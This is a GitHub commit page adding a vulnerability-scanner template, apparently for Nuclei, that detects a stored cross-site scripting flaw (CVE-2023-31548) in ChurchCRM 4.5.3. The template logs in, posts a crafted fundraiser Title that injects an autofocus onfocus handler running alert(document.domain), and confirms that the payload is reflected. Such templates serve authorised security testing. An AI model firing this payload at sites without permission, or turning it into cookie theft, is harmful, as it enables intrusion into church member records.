Create CVE-2023-31548.yaml

patch-1
Harsh Yadav 2023-06-25 02:10:57 +05:30 committed by GitHub
parent 1d2c8776a8
commit 2cc6c7d99f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2023-31548
info:
name: ChurchCRM - Stored Cross Site Scripting
author: Harsh
severity: medium
description: |
A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-31548
- https://nvd.nist.gov/vuln/detail/CVE-2023-31548
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-31548
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,churchCRM,stored,xss,authenticated
http:
- raw:
- |
POST /churchcrm/session/begin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
POST /churchcrm/FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
FundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "alert(document.domain)")'
- 'contains(body_2, "ChurchCRM")'
condition: and